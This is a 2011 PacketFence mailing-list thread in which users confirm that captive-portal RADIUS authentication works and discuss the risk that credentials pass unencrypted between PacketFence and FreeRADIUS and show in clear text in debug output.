>This, of course, doesn't address your point of traffic between PF and radius >but I think that it's another encrypted channel between radius and the ldap >side of ?>things ...
Usually the traffic between FR and the LDAP backend is encrypted, but it is not necessary to make it function ... highly advisable, but not a requisite ...unless your LDAP only stores encrypted user account info (I believe MS AD is this way) >We have a dedicated radius installation on the PF server itself ; all traffic >between the two is therefore loopback and I don't think it can at all be seen >from outside >the box. (Please let me know if this is a misconception !) You are correct the loopback traffic will not be visible on the wire, however in our deployment the FR server and the PF server are not the same, they are on a dedicated server vlan so that mitigates our risk but if someone else deploys the same setup and the data must traverse vlans that may not be for servers only the data would be easily stolen. Think if a branch office deployed PF and wanted to use a FR server at the main branch to do the captive portal auth, they would be sending that info across public links ... vary bad idea in this case : ). An easy work around would be to setup a FR server on the PF box that would then proxy encrypted requests to the correct FR server, but that could be difficult for someone who is not well versed in FR. My more immediate concern is that anyone looking at the debug output of the FR server will be able to watch user names and passwords scroll by in completely clear text, again in a complex environment where the same people may not manage the FR server and the PF server that may be an issue. Not to mention the regulatory concerns, I am speaking of regulations like Sarbanes-Oxley, HIPA, FIRPA, etc. BTW: even if your FR server is the same as your PF server, this still applies. Jake Sallee Godfather Of Bandwidth Network Engineer Fone: 254-295-4658 Phax: 254-295-4221 -----Original Message----- From: cg [mailto:[email protected]] Sent: Friday, January 28, 2011 10:15 AM To: [email protected] Subject: Re: [Packetfence-users] What's the status with Captive portal RADIUS Authentication ? Hi Jake, As we have both EAP and the captive portal in our system, we (obviously) had to set up radius for both modes. EAP authentication has always worked well once we configured radius to work with our ldap system but the CP side of it was dodgy, at best. We have recently set up a second 'inner-tunnel' to channel the radius traffic to ldap. This, of course, doesn't address your point of traffic between PF and radius but I think that it's another encrypted channel between radius and the ldap side of things ... We have a dedicated radius installation on the PF server itself ; all traffic between the two is therefore loopback and I don't think it can at all be seen from outside the box. (Please let me know if this is a misconception !) Thanks for the input ... Best, Chris On Thu 27.Jan'11 at 22:25:31 +0000, Sallee, Stephen (Jake) wrote: > I can attest that the RADIUS auth works for the captive portal, but it would > be nice if the RADIUS module would use some form of encryption for > communicating with the RADIUS server. > > As it stands anyone watching the debug output of the radius server can see > the usernames and passwords of all the users using the captive portal in > clear text! It is highly unlikely that anyone would be able to sniff the > traffic between the PF server and the RADIUS server but if they did your > users' info would be amazingly easy to steal. > > Jake Sallee > Godfather Of Bandwidth > Network Engineer > > Fone: 254-295-4658 > Phax: 254-295-4221 > > > -----Original Message----- > From: Olivier Bilodeau [mailto:[email protected]] > Sent: Thursday, January 27, 2011 4:05 PM > To: [email protected] > Subject: [Packetfence-users] What's the status with Captive portal RADIUS > Authentication ? > > Hi, > > Not so long ago someone reported that they couldn't get the > authentication::radius module to work with their captive portal. I can't > recall the exact details but I wasn't provided a specific error aside from > "it doesn't work". > > At the time, I filed a ticket for it here: #1093: regression in > authentication::radius > http://www.packetfence.org/bugs/view.php?id=1093 > > Since then I saw the module used successfully in action. > > My question is: what's the status? can I close the ticket? > > Cheers! > -- > Olivier Bilodeau > [email protected] :: +1.514.447.4918 *115 :: www.inverse.ca > Inverse inc. :: Leaders behind SOGo (www.sogo.nu) and PacketFence > (www.packetfence.org) > > ---------------------------------------------------------------------- > -------- Special Offer-- Download ArcSight Logger for FREE (a $49 USD > value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires February 28th, > so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > Packetfence-users mailing list > [email protected] > https://lists.sourceforge.net/lists/listinfo/packetfence-users > > ---------------------------------------------------------------------- > -------- Special Offer-- Download ArcSight Logger for FREE (a $49 USD > value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > Packetfence-users mailing list > [email protected] > https://lists.sourceforge.net/lists/listinfo/packetfence-users > ------------------------------------------------------------------------------ Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! Finally, a world-class log management solution at an even better price-free! Download using promo code Free_Logger_4_Dev2Dev. Offer expires February 28th, so secure your free ArcSight Logger TODAY! http://p.sf.net/sfu/arcsight-sfd2d _______________________________________________ Packetfence-users mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/packetfence-users ------------------------------------------------------------------------------ Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! Finally, a world-class log management solution at an even better price-free! Download using promo code Free_Logger_4_Dev2Dev. Offer expires February 28th, so secure your free ArcSight Logger TODAY! http://p.sf.net/sfu/arcsight-sfd2d _______________________________________________ Packetfence-users mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/packetfence-users
